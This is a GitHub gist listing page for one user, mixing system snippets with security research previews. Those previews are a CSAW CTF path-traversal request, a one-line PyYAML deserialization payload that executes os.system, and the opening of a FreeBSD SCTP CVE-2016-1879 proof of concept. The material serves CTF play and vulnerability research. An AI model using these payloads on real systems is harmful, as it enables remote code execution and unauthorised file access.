Skip to content

Instantly share code, notes, and snippets.

View takeshixx's full-sized avatar
👾

Niklaus Schiess takeshixx

👾
139 followers · 1 following
View GitHub Profile
@takeshixx
takeshixx / parser.c
Created December 9, 2018 02:20
#include <uapi/linux/ptrace.h>
#include <net/sock.h>
#include <bcc/proto.h>
#define ETH_HLEN 14
/*eBPF program.
Filter Packets
return 0 -> DROP the packet
return -1 -> KEEP the packet and return it to user space (userspace can read it from the socket_fd )
@takeshixx
takeshixx / csgoblog.py
Last active December 5, 2018 14:20
Poll CS:GO blog for new blog posts.
#!/usr/bin/env python3
import sys
import time
import requests
import smtplib
import email.message
from lxml import html
SMTP_HOST = 'localhost'
SMTP_PORT = 25
@takeshixx
takeshixx / 33C3
Created December 27, 2016 13:27
33C3 WPA2 802.1X config for netctl
Description='33C3 WPA2 802.1x WiFi'
Interface=wlp4s0
Connection=wireless
Security=wpa-configsection
IP=dhcp
Essid=33C3
WPAConfigSection=(
'ssid="33C3"'
'proto=RSN WPA'
'key_mgmt=WPA-EAP'
@takeshixx
takeshixx / ubuntu-xenial-armfh-qemu.md
Last active October 22, 2023 12:14
Running Ubuntu 16.04.1 armhf on Qemu

Running Ubuntu 16.04.1 armhf on Qemu

This is a writeup about how to install Ubuntu 16.04.1 Xenial Xerus for the 32-bit hard-float ARMv7 (armhf) architecture on a Qemu VM via Ubuntu netboot.

The setup will create a Ubuntu VM with LPAE extensions (generic-lpae) enabled. However, this writeup should also work for non-LPAE (generic) kernels.

The performance of the resulting VM is quite good, and it allows VMs with >1G ram (compared to 256M on versatilepb and 1G on versatile-a9/versatile-a15). It also supports virtio disks whereas versatile-a9/versatile-a15 only support SD cards via the -sd argument.

Get netboot files

@takeshixx
takeshixx / wtf.md
Last active September 19, 2016 09:31
CSAW CTF 2016 wtf.sh Writeup

CSAW CTF 2016 wtf.sh Writeup

wtf.sh was a challenge that included two flags, one for 150pts and one for 400pts.

wtf.sh (1) (150pts)

In the first part we needed to call the function get_flag1 in order to receive the flag. The post parameter of post.wtf was vulnerable to a path traversal:

GET /profile.wtf?user=../posts HTTP/1.1
@takeshixx
takeshixx / yamlexec.py
Created July 6, 2016 10:01
yaml.load('!!python/object/apply:os.system ["id"]')
@takeshixx
takeshixx / github.sh
Created July 6, 2016 09:55
Clone all OpenStack repositories from GitHub
for i in $(curl -s "https://api.github.com/orgs/openstack/repos?per_page=999" |jq -r '.[] .clone_url');do git clone $i;done
@takeshixx
takeshixx / asyncio_ssl_example.py
Created May 12, 2016 15:08 — forked from messa/asyncio_ssl_example.py
Python asyncio + SSL TCP client/server example
#!/usr/bin/env python3
import asyncio
import multiprocessing
import os
import ssl
from time import sleep
port = 9000
@takeshixx
takeshixx / secure_client.py
Created May 2, 2016 14:12
#!/usr/bin/env python3
import socket
import ssl
import sys
try:
from pyasn1.codec.der import decoder
from pyasn1_modules import rfc2459
except ImportError:
print('Run: pip install pyasn1 pyasn1-modules')
sys.exit(1)
@takeshixx
takeshixx / byebyebsd.py
Last active January 22, 2016 20:06
FreeBSD SCTP ICMPv6 error message vulnerability (FreeBSD-SA-16:01.sctp / CVE-2016-1879) PoC
# FreeBSD SCTP ICMPv6 error message vulnerability (FreeBSD-SA-16:01.sctp / CVE-2016-1879) PoC
# https://www.freebsd.org/security/advisories/FreeBSD-SA-16:01.sctp.asc
# https://github.com/freebsd/freebsd/commit/51f55053b6565d2fe9b61f63460dddc23284a103
import sys
from scapy.all import *
if len(sys.argv) is not 3:
print('{} target_ip interface'.format(sys.argv[0]))
exit(1)